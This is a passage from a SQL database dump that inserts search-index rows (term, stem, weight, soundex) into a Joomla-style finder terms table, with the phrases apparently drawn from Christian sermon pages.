(276097, 'would be an', 'would be an', 0, 1, 1.3667, 'W4315', 1, '*'),
(276098, 'wrestle', 'wrestl', 0, 0, 0.4667, 'W6234', 2, '*'),
(276099, 'wrestle against', 'wrestl against', 0, 1, 1.5, 'W62342523', 1, '*'),
(276100, 'wrestle against principalities', 'wrestl against principalities', 0, 1, 2, 'W6234252316521432', 1, '*'),
(276101, 'you a thermometer', 'you a thermometer', 0, 1, 1.5667, 'Y36536', 1, '*'),
(276102, 'you all you', 'you all you', 0, 1, 1.3667, 'Y400', 1, '*'),
(276103, 'you ask', 'you ask', 0, 1, 1.2333, 'Y200', 1, '*'),
(276104, 'you ask yourself', 'you ask yourself', 0, 1, 1.5333, 'Y26241', 1, '*'),
(276105, 'you by your', 'you by your', 0, 1, 1.3667, 'Y160', 1, '*'),
(276106, 'you can do', 'you can do', 0, 1, 1.3333, 'Y253', 1, '*'),
(276107, 'you change', 'you change', 0, 1, 1.3333, 'Y252', 1, '*'),
(276108, 'you change the', 'you change the', 0, 1, 1.4667, 'Y2523', 1, '*'),
(276109, 'you concerning', 'you concerning', 0, 1, 1.4667, 'Y252652', 1, '*'),
(276110, 'you concerning something', 'you concerning something', 0, 1, 1.8, 'Y2526525352', 1, '*'),
(276111, 'you don\'t even', 'you don even', 0, 1, 1.4667, 'Y35315', 1, '*'),
(276112, 'you don\'t have', 'you don have', 0, 1, 1.4667, 'Y3531', 2, '*'),
(276113, 'you effectively', 'you effectively', 0, 1, 1.5, 'Y12314', 1, '*'),
(276114, 'you effectively conduct', 'you effectively conduct', 0, 1, 1.7667, 'Y1231425323', 1, '*'),
(276115, 'you end', 'you end', 0, 1, 1.2333, 'Y530', 1, '*'),
(276116, 'you end changing', 'you end changing', 0, 1, 1.5333, 'Y5325252', 1, '*'),
(276117, 'you engage in', 'you engage in', 0, 1, 1.4333, 'Y525', 1, '*'),
(276118, 'you get out', 'you get out', 0, 1, 1.3667, 'Y230', 1, '*'),
(276119, 'you he hates', 'you he hates', 0, 1, 1.4, 'Y320', 1, '*'),
(276120, 'you know and', 'you know and', 0, 1, 1.4, 'Y253', 1, '*'),
(276121, 'you must arm', 'you must arm', 0, 1, 1.4, 'Y52365', 1, '*'),
(276122, 'you must learn', 'you must learn', 0, 1, 1.4667, 'Y523465', 1, '*'),
(276123, 'you must remember', 'you must remember', 0, 1, 1.5667, 'Y5236516', 1, '*'),
(276124, 'you must spend', 'you must spend', 0, 1, 1.4667, 'Y5232153', 2, '*'),
(276125, 'you or you', 'you or you', 0, 1, 1.3333, 'Y600', 1, '*'),
(276126, 'you prepare', 'you prepare', 0, 1, 1.3667, 'Y1616', 1, '*'),
(276127, 'you prepare yourself', 'you prepare yourself', 0, 1, 1.6667, 'Y1616241', 1, '*'),
(276128, 'you really', 'you really', 0, 1, 1.3333, 'Y640', 1, '*'),
(276129, 'you really cannot', 'you really cannot', 0, 1, 1.5667, 'Y64253', 1, '*'),
(276130, 'you this question', 'you this question', 0, 1, 1.5667, 'Y3235', 1, '*'),
(276131, 'you to develop', 'you to develop', 0, 1, 1.4667, 'Y3141', 1, '*'),
(276132, 'you to lead', 'you to lead', 0, 1, 1.3667, 'Y343', 1, '*'),
(276133, 'you\'ll never know', 'you never know', 0, 1, 1.5667, 'Y451625', 1, '*'),
(276134, 'you\'ll never really', 'you never really', 0, 1, 1.6333, 'Y45164', 1, '*'),
(276135, 'you\'ll officially', 'you officially', 0, 1, 1.5667, 'Y4124', 1, '*'),
(276136, 'you\'ll officially become', 'you officially become', 0, 1, 1.8, 'Y4124125', 1, '*'),
(276137, 'you\'ve heard', 'you heard', 0, 1, 1.4, 'Y163', 1, '*'),
(276138, 'you\'ve heard into', 'you heard into', 0, 1, 1.5667, 'Y16353', 1, '*'),
(276139, 'youare', 'youar', 0, 0, 0.4, 'Y600', 1, '*'),
(276140, 'youare to', 'youar to', 0, 1, 1.3, 'Y630', 1, '*'),
(276141, 'youare to be', 'youar to be', 0, 1, 1.4, 'Y631', 1, '*'),
(276142, 'your \'intercessory', 'your intercessory', 0, 1, 1.6, 'Y653626', 1, '*'),
(276143, 'your \'intercessory muscles\'', 'your intercessory muscles', 0, 1, 1.9, 'Y6536265242', 1, '*'),
(276144, 'your church ignites', 'your church ignites', 0, 1, 1.6333, 'Y6262532', 1, '*'),
(276145, 'your daily activities', 'your daily activities', 0, 1, 1.7, 'Y63423132', 1, '*'),
(276146, 'your direction', 'your direction', 0, 1, 1.4667, 'Y636235', 1, '*'),
(276147, 'your direction and', 'your direction and', 0, 1, 1.6, 'Y6362353', 1, '*'),
(276148, 'your divine destiny', 'your divine destiny', 0, 1, 1.6333, 'Y63153235', 1, '*'),
(276149, 'your duties', 'your duties', 0, 1, 1.3667, 'Y632', 1, '*'),
(276150, 'your duties in', 'your duties in', 0, 1, 1.4667, 'Y6325', 1, '*'),
(276151, 'your faith can', 'your faith can', 0, 1, 1.4667, 'Y61325', 1, '*'),
(276152, 'your faith you', 'your faith you', 0, 1, 1.4667, 'Y613', 2, '*'),
(276153, 'your fellow', 'your fellow', 0, 1, 1.3667, 'Y614', 1, '*'),
(276154, 'your fellow christians', 'your fellow christians', 0, 1, 1.7333, 'Y614262352', 1, '*'),
(276155, 'your heart 5', 'your heart 5', 0, 1, 1.4, 'Y630', 1, '*'),
(276156, 'your intercessory', 'your intercessory', 0, 1, 1.5667, 'Y653626', 1, '*'),
(276157, 'your intercessory ability', 'your intercessory ability', 0, 1, 1.8333, 'Y653626143', 1, '*'),
(276158, 'your mind and', 'your mind and', 0, 1, 1.4333, 'Y65353', 1, '*'),
(276159, 'your money', 'your money', 0, 1, 1.3333, 'Y650', 1, '*'),
(276160, 'your money not', 'your money not', 0, 1, 1.4667, 'Y653', 1, '*'),
(276161, 'your pastor instead', 'your pastor instead', 0, 1, 1.6333, 'Y61236523', 1, '*'),
(276162, 'your place of', 'your place of', 0, 1, 1.4333, 'Y61421', 1, '*'),
(276163, 'your position at', 'your position at', 0, 1, 1.5333, 'Y612353', 1, '*'),
(276164, 'your prayer urgently', 'your prayer urgently', 0, 1, 1.6667, 'Y6162534', 1, '*'),
(276165, 'your sermon', 'your sermon', 0, 1, 1.3667, 'Y6265', 1, '*'),
(276166, 'your sermon notes', 'your sermon notes', 0, 1, 1.5667, 'Y626532', 1, '*'),
(276167, 'your spirit such', 'your spirit such', 0, 1, 1.5333, 'Y621632', 1, '*'),
(276168, 'your time reading', 'your time reading', 0, 1, 1.5667, 'Y6356352', 1, '*'),
(276169, 'yourself and drive', 'yourself and drive', 0, 1, 1.6, 'Y62415361', 1, '*'),
(276170, 'yourself for', 'yourself for', 0, 1, 1.4, 'Y62416', 1, '*'),
(276171, 'yourself for leadership', 'yourself for leadership', 0, 1, 1.7667, 'Y6241643621', 1, '*'),
(276172, 'yourself take', 'yourself take', 0, 1, 1.4333, 'Y624132', 1, '*'),
(276173, 'yourself take intercession', 'yourself take intercession', 0, 1, 1.8667, 'Y62413253625', 1, '*'),
(276174, 'yourself this', 'yourself this', 0, 1, 1.4333, 'Y624132', 1, '*'),
(276175, 'yourself this morning', 'yourself this morning', 0, 1, 1.7, 'Y6241325652', 1, '*'),
(276176, 'yourself with the', 'yourself with the', 0, 1, 1.5667, 'Y62413', 1, '*'),
(276548, '12 02', '12 02', 0, 1, 1.1667, '', 1, '*'),
(276549, '12 02 2017', '12 02 2017', 0, 1, 1.3333, '', 1, '*'),
(276550, '19 says', '19 says', 0, 1, 1.2333, 'S000', 1, '*'),
(276551, '19 says rt', '19 says rt', 0, 1, 1.3333, 'S630', 1, '*'),
(276552, '23 from', '23 from', 0, 1, 1.2333, 'F650', 1, '*'),
(276553, '23 from our', '23 from our', 0, 1, 1.3667, 'F656', 1, '*'),
(276554, '60 19', '60 19', 0, 1, 1.1667, '', 1, '*'),
(276555, '60 19 says', '60 19 says', 0, 1, 1.3333, 'S000', 1, '*'),
(276556, 'a decision and', 'a decision and', 0, 1, 1.4667, 'A3253', 1, '*'),
(276557, 'a prophecy', 'a prophecy', 0, 1, 1.3333, 'A1612', 1, '*'),
(276558, 'a prophecy that', 'a prophecy that', 0, 1, 1.5, 'A16123', 1, '*'),
(276559, 'a school lesser', 'a school lesser', 0, 1, 1.5, 'A2426', 1, '*'),
(276560, 'a time god', 'a time god', 0, 1, 1.3333, 'A3523', 1, '*'),
(276561, 'a time will', 'a time will', 0, 1, 1.3667, 'A354', 2, '*'),
(276562, 'a zone', 'a zone', 0, 1, 1.2, 'A250', 1, '*'),
(276563, 'a zone and', 'a zone and', 0, 1, 1.3333, 'A253', 1, '*'),
(276564, 'actually desire', 'actual desire', 0, 1, 1.5, 'A234326', 1, '*'),
(276565, 'actually desire because', 'actual desire because', 0, 1, 1.7667, 'A23432612', 1, '*'),
(276566, 'add lomillion', 'add lomillion', 0, 1, 1.4333, 'A34545', 1, '*'),
(276567, 'add lomillion to', 'add lomillion to', 0, 1, 1.5333, 'A345453', 1, '*'),
(276568, 'ahead don\'t', 'ahead don', 0, 1, 1.3667, 'A353', 1, '*'),
(276569, 'ahead don\'t try', 'ahead don try', 0, 1, 1.5, 'A3536', 1, '*'),
(276570, 'ahead you', 'ahead you', 0, 1, 1.3, 'A300', 1, '*'),
(276571, 'ahead you will', 'ahead you will', 0, 1, 1.4667, 'A340', 1, '*'),
(276572, 'all the evil', 'all the evil', 0, 1, 1.4, 'A4314', 1, '*'),
(276573, 'along this', 'along this', 0, 1, 1.3333, 'A45232', 1, '*'),
(276574, 'along this year', 'along this year', 0, 1, 1.5, 'A452326', 1, '*'),
(276575, 'also someone', 'also someone', 0, 1, 1.4, 'A425', 1, '*'),
(276576, 'also someone called', 'also someone called', 0, 1, 1.6333, 'A425243', 1, '*'),
(276577, 'always someone', 'alwai someone', 0, 1, 1.4667, 'A425', 1, '*'),
(276578, 'always someone called', 'alwai someone called', 0, 1, 1.7, 'A425243', 1, '*'),
(276579, 'among those', 'among those', 0, 1, 1.3667, 'A5232', 1, '*'),
(276580, 'among those that', 'among those that', 0, 1, 1.5333, 'A52323', 1, '*'),
(276581, 'an everlasting', 'an everlasting', 0, 1, 1.4667, 'A51642352', 1, '*'),
(276582, 'an everlasting light', 'an everlasting light', 0, 1, 1.6667, 'A51642352423', 1, '*'),
(276583, 'an opportunity', 'an opportunity', 0, 1, 1.4667, 'A516353', 1, '*'),
(276584, 'an opportunity to', 'an opportunity to', 0, 1, 1.5667, 'A516353', 1, '*'),
(276585, 'and at', 'and at', 0, 1, 1.2, 'A530', 1, '*'),
(276586, 'and at the', 'and at the', 0, 1, 1.3333, 'A530', 1, '*'),
(276587, 'and god is', 'and god is', 0, 1, 1.3333, 'A53232', 2, '*'),
(276588, 'and it looks', 'and it looks', 0, 1, 1.4, 'A5342', 1, '*'),
(276589, 'and say lord', 'and say lord', 0, 1, 1.4, 'A532463', 1, '*'),
(276590, 'and some will', 'and some will', 0, 1, 1.4333, 'A53254', 1, '*'),
(276591, 'and supporting', 'and supporting', 0, 1, 1.4667, 'A53216352', 1, '*'),
(276592, 'and supporting you', 'and supporting you', 0, 1, 1.6, 'A53216352', 1, '*'),
(276593, 'and the prophetic', 'and the prophetic', 0, 1, 1.5667, 'A5316132', 1, '*'),
(276594, 'and thy god', 'and thy god', 0, 1, 1.3667, 'A5323', 1, '*'),
(276595, 'and usual', 'and usual', 0, 1, 1.3, 'A5324', 1, '*'),
(276596, 'and usual can\'t', 'and usual can', 0, 1, 1.5, 'A5324253', 1, '*'),
(276597, 'and we entering', 'and we entering', 0, 1, 1.5, 'A5353652', 1, '*'),
(276598, 'and what to', 'and what to', 0, 1, 1.3667, 'A530', 1, '*'),
(276599, 'another person\'s faith', 'anoth person faith', 0, 1, 1.7333, 'A5361625213', 1, '*'),
(276600, 'any egyptian', 'ani egyptian', 0, 1, 1.4, 'A52135', 1, '*'),
(276601, 'any egyptian that', 'ani egyptian that', 0, 1, 1.5667, 'A521353', 1, '*'),
(276602, 'anything that god', 'anyth that god', 0, 1, 1.5667, 'A5352323', 1, '*'),
(276603, 'are facing', 'ar facing', 0, 1, 1.3333, 'A61252', 1, '*'),
(276604, 'are facing at', 'ar facing at', 0, 1, 1.4333, 'A612523', 1, '*'),
(276605, 'are sending', 'ar sending', 0, 1, 1.3667, 'A625352', 1, '*'),
(276606, 'are sending their', 'ar sending their', 0, 1, 1.5667, 'A62535236', 1, '*'),
(276607, 'are separated', 'ar separated', 0, 1, 1.4333, 'A62163', 1, '*'),
(276608, 'are separated from', 'ar separated from', 0, 1, 1.6, 'A62163165', 1, '*'),
(276609, 'are stepping', 'ar stepping', 0, 1, 1.4, 'A623152', 1, '*'),
(276610, 'are stepping into', 'ar stepping into', 0, 1, 1.5667, 'A62315253', 1, '*'),
(276611, 'are used', 'ar used', 0, 1, 1.2667, 'A623', 1, '*'),
(276612, 'are used to', 'ar used to', 0, 1, 1.3667, 'A623', 1, '*'),
(276613, 'are you going', 'ar you going', 0, 1, 1.4333, 'A6252', 1, '*'),
(276614, 'ask you to', 'ask you to', 0, 1, 1.3333, 'A230', 1, '*'),
(276615, 'at such', 'at such', 0, 1, 1.2333, 'A320', 1, '*'),
(276616, 'at such instances', 'at such instances', 0, 1, 1.5667, 'A3252352', 1, '*'),
(276617, 'at such times', 'at such times', 0, 1, 1.4333, 'A32352', 1, '*'),
(276618, 'at that', 'at that', 0, 1, 1.2333, 'A300', 2, '*'),
(276619, 'at that moment', 'at that moment', 0, 1, 1.4667, 'A353', 1, '*'),
(276620, 'at the end', 'at the end', 0, 1, 1.3333, 'A353', 2, '*'),
(276621, 'at the point', 'at the point', 0, 1, 1.4, 'A3153', 1, '*'),
(276622, 'attention of', 'attent of', 0, 1, 1.4, 'A35351', 1, '*'),
(276623, 'attention of the', 'attent of the', 0, 1, 1.5333, 'A353513', 1, '*'),
(276624, 'backing', 'back', 0, 0, 0.4667, 'B252', 2, '*'),
(276625, 'backing and', 'back and', 0, 1, 1.3667, 'B25253', 1, '*'),
(276626, 'backing and supporting', 'back and supporting', 0, 1, 1.7333, 'B25253216352', 1, '*'),
(276627, 'bad don\'t', 'bad don', 0, 1, 1.3, 'B353', 1, '*'),
(276628, 'bad don\'t step', 'bad don step', 0, 1, 1.4667, 'B353231', 1, '*'),
(276629, 'be among', 'be among', 0, 1, 1.2667, 'B520', 1, '*'),
(276630, 'be among those', 'be among those', 0, 1, 1.4667, 'B5232', 1, '*'),
(276631, 'be in faith', 'be in faith', 0, 1, 1.3667, 'B513', 1, '*'),
(276632, 'be no', 'be no', 0, 1, 1.1667, 'B500', 1, '*'),
(276633, 'be no more', 'be no more', 0, 1, 1.3333, 'B560', 1, '*'),
(276634, 'be unto', 'be unto', 0, 1, 1.2333, 'B530', 1, '*'),
(276635, 'be unto thee', 'be unto thee', 0, 1, 1.4, 'B530', 1, '*'),
(276636, 'be your light', 'be your light', 0, 1, 1.4333, 'B6423', 1, '*'),
(276637, 'because oflack', 'becaus oflack', 0, 1, 1.4667, 'B2142', 1, '*'),
(276638, 'because oflack of', 'becaus oflack of', 0, 1, 1.5667, 'B21421', 1, '*'),
(276639, 'before you take', 'befor you take', 0, 1, 1.5, 'B632', 1, '*'),
(276640, 'begin to draw', 'begin to draw', 0, 1, 1.4333, 'B2536', 1, '*'),
(276641, 'beloved life', 'belov life', 0, 1, 1.4, 'B41341', 1, '*'),
(276642, 'beloved life has', 'belov life has', 0, 1, 1.5333, 'B413412', 1, '*'),
(276643, 'between the', 'between the', 0, 1, 1.3667, 'B353', 1, '*'),
(276644, 'between the different', 'between the different', 0, 1, 1.7, 'B3531653', 1, '*'),
(276645, 'brightness', 'bright', 0, 0, 0.6667, 'B62352', 1, '*'),
(276646, 'brightness shall', 'bright shall', 0, 1, 1.5333, 'B623524', 1, '*'),
(276647, 'brightness shall the', 'bright shall the', 0, 1, 1.6667, 'B6235243', 1, '*'),
(276648, 'but light', 'but light', 0, 1, 1.3, 'B3423', 1, '*'),
(276649, 'but light in', 'but light in', 0, 1, 1.4, 'B34235', 1, '*'),
(276650, 'but to tell', 'but to tell', 0, 1, 1.3667, 'B340', 1, '*'),
(276651, 'but what is', 'but what is', 0, 1, 1.3667, 'B320', 1, '*'),
(276652, 'but your', 'but your', 0, 1, 1.2667, 'B360', 1, '*'),
(276653, 'but your own', 'but your own', 0, 1, 1.4, 'B365', 1, '*'),
(276654, 'but yourown', 'but yourown', 0, 1, 1.3667, 'B365', 1, '*'),
(276655, 'but yourown faith', 'but yourown faith', 0, 1, 1.5667, 'B36513', 1, '*'),
(276656, 'by cash', 'by cash', 0, 1, 1.2333, 'B200', 1, '*'),
(276657, 'by cash you', 'by cash you', 0, 1, 1.3667, 'B200', 1, '*'),
(276658, 'by day', 'by day', 0, 1, 1.2, 'B300', 1, '*'),
(276659, 'by day neither', 'by day neither', 0, 1, 1.4667, 'B3536', 1, '*'),
(276660, 'by day whatever', 'by day whatever', 0, 1, 1.5, 'B316', 1, '*'),
(276661, 'by faith before', 'by faith before', 0, 1, 1.5, 'B316', 1, '*'),
(276662, 'by faith how', 'by faith how', 0, 1, 1.4, 'B300', 1, '*'),
(276663, 'called god', 'call god', 0, 1, 1.3333, 'C4323', 1, '*'),
(276664, 'called god and', 'call god and', 0, 1, 1.4667, 'C432353', 1, '*'),
(276665, 'called satan', 'call satan', 0, 1, 1.4, 'C43235', 1, '*'),
(276666, 'called satan if', 'call satan if', 0, 1, 1.5, 'C432351', 1, '*'),
(276667, 'can add lomillion', 'can add lomillion', 0, 1, 1.5667, 'C534545', 1, '*'),
(276668, 'can deal', 'can deal', 0, 1, 1.2667, 'C534', 1, '*'),
(276669, 'can deal with', 'can deal with', 0, 1, 1.4333, 'C5343', 1, '*'),
(276670, 'can only go', 'can only go', 0, 1, 1.3667, 'C542', 1, '*'),
(276671, 'can your', 'can your', 0, 1, 1.2667, 'C560', 1, '*'),
(276672, 'can your faith', 'can your faith', 0, 1, 1.4667, 'C5613', 1, '*'),
(276673, 'can\'t face', 'can face', 0, 1, 1.3333, 'C5312', 1, '*'),
(276674, 'can\'t face what', 'can face what', 0, 1, 1.5, 'C53123', 1, '*'),
(276675, 'cannot take', 'cannot take', 0, 1, 1.3667, 'C532', 1, '*'),
(276676, 'cannot take anything', 'cannot take anything', 0, 1, 1.6667, 'C5325352', 1, '*'),
(276677, 'cash', 'cash', 0, 0, 0.2667, 'C000', 2, '*'),
(276678, 'cash you', 'cash you', 0, 1, 1.2667, 'C000', 1, '*'),
(276679, 'cash you will', 'cash you will', 0, 1, 1.4333, 'C400', 1, '*'),
(276680, 'children to a', 'children to a', 0, 1, 1.4333, 'C43653', 1, '*'),
(276681, 'children when', 'children when', 0, 1, 1.4333, 'C4365', 1, '*'),
(276682, 'children when christians', 'children when christians', 0, 1, 1.8, 'C4365262352', 1, '*'),
(276683, 'christians fail', 'christian fail', 0, 1, 1.5, 'C6235214', 1, '*'),
(276684, 'christians fail in', 'christian fail in', 0, 1, 1.6, 'C62352145', 1, '*'),
(276685, 'come that', 'come that', 0, 1, 1.3, 'C530', 1, '*'),
(276686, 'come that what', 'come that what', 0, 1, 1.4667, 'C530', 1, '*'),
(276687, 'come to ask', 'come to ask', 0, 1, 1.3667, 'C532', 1, '*'),
(276688, 'cost many', 'cost many', 0, 1, 1.3, 'C350', 1, '*'),
(276689, 'cost many people', 'cost many people', 0, 1, 1.5333, 'C3514', 1, '*'),
(276690, 'currency', 'currenc', 0, 0, 0.5333, 'C652', 1, '*'),
(276691, 'currency of', 'currenc of', 0, 1, 1.3667, 'C6521', 1, '*'),
(276692, 'currency of the', 'currenc of the', 0, 1, 1.5, 'C65213', 1, '*'),
(276693, 'darkness in', 'dark in', 0, 1, 1.3667, 'D62525', 1, '*'),
(276694, 'darkness in egypt', 'dark in egypt', 0, 1, 1.5667, 'D62525213', 1, '*'),
(276695, 'day neither', 'dai neither', 0, 1, 1.3667, 'D536', 1, '*'),
(276696, 'day neither for', 'dai neither for', 0, 1, 1.5, 'D53616', 1, '*'),
(276697, 'day that fear', 'dai that fear', 0, 1, 1.4333, 'D160', 1, '*'),
(276698, 'day whatever', 'dai whatever', 0, 1, 1.4, 'D160', 1, '*'),
(276699, 'day whatever god', 'dai whatever god', 0, 1, 1.5333, 'D1623', 1, '*'),
(276700, 'days ahead don\'t', 'dai ahead don', 0, 1, 1.5333, 'D2353', 1, '*'),
(276701, 'days that', 'dai that', 0, 1, 1.3, 'D230', 1, '*'),
(276702, 'days that the', 'dai that the', 0, 1, 1.4333, 'D230', 1, '*'),
(276703, 'days we', 'dai we', 0, 1, 1.2333, 'D200', 1, '*'),
(276704, 'days we are', 'dai we are', 0, 1, 1.3667, 'D260', 1, '*'),
(276705, 'deal with', 'deal with', 0, 1, 1.3, 'D430', 1, '*'),
(276706, 'deal with now', 'deal with now', 0, 1, 1.4333, 'D435', 1, '*'),
(276707, 'dearly beloved life', 'dearli beloved life', 0, 1, 1.6333, 'D64141341', 1, '*'),
(276708, 'decision and', 'decis and', 0, 1, 1.4, 'D253', 1, '*'),
(276709, 'decision and say', 'decis and say', 0, 1, 1.5333, 'D2532', 1, '*'),
(276710, 'declaration', 'declar', 0, 0, 0.7333, 'D24635', 1, '*'),
(276711, 'declaration that', 'declar that', 0, 1, 1.5333, 'D246353', 1, '*'),
(276712, 'declaration that you', 'declar that you', 0, 1, 1.6667, 'D246353', 1, '*'),
(276713, 'declare another', 'declar another', 0, 1, 1.5, 'D246536', 1, '*'),
(276714, 'declare another person\'s', 'declar another person', 0, 1, 1.8, 'D24653616252', 1, '*'),
(276715, 'declare your', 'declar your', 0, 1, 1.4, 'D246', 1, '*'),
(276716, 'declare your faith', 'declar your faith', 0, 1, 1.6, 'D24613', 1, '*'),
(276717, 'degree of', 'degre of', 0, 1, 1.3, 'D261', 1, '*'),
(276718, 'degree of the', 'degre of the', 0, 1, 1.4333, 'D2613', 1, '*'),
(276719, 'delaying', 'delai', 0, 0, 0.5333, 'D452', 1, '*'),
(276720, 'delaying you', 'delai you', 0, 1, 1.4, 'D452', 1, '*'),
(276721, 'delaying you is', 'delai you is', 0, 1, 1.5, 'D452', 1, '*'),
(276722, 'desire because', 'desir because', 0, 1, 1.4667, 'D2612', 1, '*'),
(276723, 'desire because oflack', 'desir because oflack', 0, 1, 1.7, 'D2612142', 1, '*'),
(276724, 'destruction ahead', 'destruct ahead', 0, 1, 1.5667, 'D2362353', 1, '*'),
(276725, 'destruction ahead you', 'destruct ahead you', 0, 1, 1.7, 'D2362353', 1, '*'),
(276726, 'determines the degree', 'determin the degree', 0, 1, 1.7, 'D652326', 1, '*'),
(276727, 'devil is going', 'devil is going', 0, 1, 1.4667, 'D14252', 1, '*'),
(276728, 'devil it', 'devil it', 0, 1, 1.2667, 'D143', 1, '*'),
(276729, 'devil it is', 'devil it is', 0, 1, 1.3667, 'D1432', 1, '*'),
(276730, 'difference between the', 'differ between the', 0, 1, 1.7333, 'D16521353', 1, '*'),
(276731, 'different situations and', 'differ situations and', 0, 1, 1.8, 'D1653235253', 1, '*'),
(276732, 'do at such', 'do at such', 0, 1, 1.3333, 'D200', 1, '*'),
(276733, 'do something', 'do something', 0, 1, 1.4, 'D25352', 3, '*'),
(276734, 'do something stupid', 'do something stupid', 0, 1, 1.6333, 'D25352313', 1, '*'),
(276735, 'do your', 'do your', 0, 1, 1.2333, 'D600', 1, '*'),
(276736, 'do your natural', 'do your natural', 0, 1, 1.5, 'D65364', 1, '*'),
(276737, 'don\'t step', 'don step', 0, 1, 1.3333, 'D53231', 1, '*'),
(276738, 'don\'t step out', 'don step out', 0, 1, 1.4667, 'D532313', 1, '*'),
(276739, 'don\'t take', 'don take', 0, 1, 1.3333, 'D532', 2, '*'),
(276740, 'don\'t take it', 'don take it', 0, 1, 1.4333, 'D5323', 1, '*'),
(276741, 'don\'ttry', 'don', 0, 0, 0.5333, 'D536', 1, '*'),
(276742, 'don\'ttry to', 'don to', 0, 1, 1.3667, 'D5363', 1, '*'),
(276743, 'don\'ttry to declare', 'don to declare', 0, 1, 1.6333, 'D5363246', 1, '*'),
(276744, 'down it', 'down it', 0, 1, 1.2333, 'D530', 1, '*'),
(276745, 'down it sounds', 'down it sounds', 0, 1, 1.4667, 'D532532', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(276746, 'draw the attention', 'draw the attention', 0, 1, 1.6, 'D63535', 1, '*'),
(276747, 'egypt but light', 'egypt but light', 0, 1, 1.5, 'E21313423', 1, '*'),
(276748, 'egypt there', 'egypt there', 0, 1, 1.3667, 'E2136', 1, '*'),
(276749, 'egypt there was', 'egypt there was', 0, 1, 1.5, 'E21362', 1, '*'),
(276750, 'egyptian that', 'egyptian that', 0, 1, 1.4333, 'E21353', 1, '*'),
(276751, 'egyptian that was', 'egyptian that was', 0, 1, 1.5667, 'E213532', 1, '*'),
(276752, 'egyptians', 'egyptian', 0, 0, 0.6, 'E21352', 1, '*'),
(276753, 'egyptians were', 'egyptian were', 0, 1, 1.4667, 'E213526', 1, '*'),
(276754, 'egyptians were not', 'egyptian were not', 0, 1, 1.6, 'E21352653', 1, '*'),
(276755, 'end of', 'end of', 0, 1, 1.2, 'E531', 1, '*'),
(276756, 'end of faith', 'end of faith', 0, 1, 1.4, 'E5313', 1, '*'),
(276757, 'end of fear', 'end of fear', 0, 1, 1.3667, 'E5316', 1, '*'),
(276758, 'entering', 'enter', 0, 0, 0.5333, 'E53652', 1, '*'),
(276759, 'entering into', 'enter into', 0, 1, 1.4333, 'E5365253', 1, '*'),
(276760, 'entering into the', 'enter into the', 0, 1, 1.5667, 'E5365253', 1, '*'),
(276761, 'everlasting', 'everlast', 0, 0, 0.7333, 'E1642352', 1, '*'),
(276762, 'everlasting light', 'everlast light', 0, 1, 1.5667, 'E1642352423', 1, '*'),
(276763, 'everlasting light and', 'everlast light and', 0, 1, 1.7, 'E164235242353', 1, '*'),
(276764, 'evil touching', 'evil touching', 0, 1, 1.4333, 'E143252', 1, '*'),
(276765, 'evil touching the', 'evil touching the', 0, 1, 1.5667, 'E1432523', 1, '*'),
(276766, 'exactly what', 'exactli what', 0, 1, 1.4, 'E2343', 1, '*'),
(276767, 'exactly what you', 'exactli what you', 0, 1, 1.5333, 'E2343', 1, '*'),
(276768, 'experiences you have', 'experi you have', 0, 1, 1.6667, 'E216521', 1, '*'),
(276769, 'face what', 'face what', 0, 1, 1.3, 'F230', 1, '*'),
(276770, 'face what you', 'face what you', 0, 1, 1.4333, 'F230', 1, '*'),
(276771, 'facing at', 'face at', 0, 1, 1.3, 'F2523', 1, '*'),
(276772, 'facing at such', 'face at such', 0, 1, 1.4667, 'F25232', 1, '*'),
(276773, 'fail in life', 'fail in life', 0, 1, 1.4, 'F4541', 1, '*'),
(276774, 'failed god', 'fail god', 0, 1, 1.3333, 'F4323', 1, '*'),
(276775, 'failed god wants', 'fail god wants', 0, 1, 1.5333, 'F4323532', 1, '*'),
(276776, 'failed it', 'fail it', 0, 1, 1.3, 'F430', 1, '*'),
(276777, 'failed it was', 'fail it was', 0, 1, 1.4333, 'F432', 1, '*'),
(276778, 'faith before', 'faith before', 0, 1, 1.4, 'F316', 1, '*'),
(276779, 'faith before you', 'faith before you', 0, 1, 1.5333, 'F316', 1, '*'),
(276780, 'faith but your', 'faith but your', 0, 1, 1.4667, 'F3136', 1, '*'),
(276781, 'faith but yourown', 'faith but yourown', 0, 1, 1.5667, 'F31365', 1, '*'),
(276782, 'faith determines', 'faith determines', 0, 1, 1.5333, 'F3652', 1, '*'),
(276783, 'faith determines the', 'faith determines the', 0, 1, 1.6667, 'F36523', 1, '*'),
(276784, 'faith don\'ttry', 'faith don', 0, 1, 1.4667, 'F3536', 1, '*'),
(276785, 'faith don\'ttry to', 'faith don to', 0, 1, 1.5667, 'F35363', 1, '*'),
(276786, 'faith faith', 'faith faith', 0, 1, 1.3667, 'F313', 1, '*'),
(276787, 'faith faith is', 'faith faith is', 0, 1, 1.4667, 'F3132', 1, '*'),
(276788, 'faith how', 'faith how', 0, 1, 1.3, 'F300', 1, '*'),
(276789, 'faith how long', 'faith how long', 0, 1, 1.4667, 'F3452', 1, '*'),
(276790, 'faith i', 'faith i', 0, 1, 1.2333, 'F300', 1, '*'),
(276791, 'faith i have', 'faith i have', 0, 1, 1.4, 'F310', 1, '*'),
(276792, 'faith if', 'faith if', 0, 1, 1.2667, 'F310', 1, '*'),
(276793, 'faith if you', 'faith if you', 0, 1, 1.4, 'F310', 1, '*'),
(276794, 'faith is always', 'faith is always', 0, 1, 1.5, 'F3242', 1, '*'),
(276795, 'faith knows', 'faith knows', 0, 1, 1.3667, 'F3252', 1, '*'),
(276796, 'faith knows exactly', 'faith knows exactly', 0, 1, 1.6333, 'F325234', 1, '*'),
(276797, 'faith most', 'faith most', 0, 1, 1.3333, 'F3523', 1, '*'),
(276798, 'faith most of', 'faith most of', 0, 1, 1.4333, 'F35231', 1, '*'),
(276799, 'faith take', 'faith take', 0, 1, 1.3333, 'F320', 1, '*'),
(276800, 'faith take thatis', 'faith take thatis', 0, 1, 1.5667, 'F3232', 1, '*'),
(276801, 'faith that failed', 'faith that failed', 0, 1, 1.5667, 'F3143', 1, '*'),
(276802, 'faith there will', 'faith there will', 0, 1, 1.5333, 'F364', 1, '*'),
(276803, 'faith you can', 'faith you can', 0, 1, 1.4333, 'F325', 1, '*'),
(276804, 'faith you cannot', 'faith you cannot', 0, 1, 1.5333, 'F3253', 1, '*'),
(276805, 'faith your', 'faith your', 0, 1, 1.3333, 'F360', 1, '*'),
(276806, 'faith your faith', 'faith your faith', 0, 1, 1.5333, 'F3613', 1, '*'),
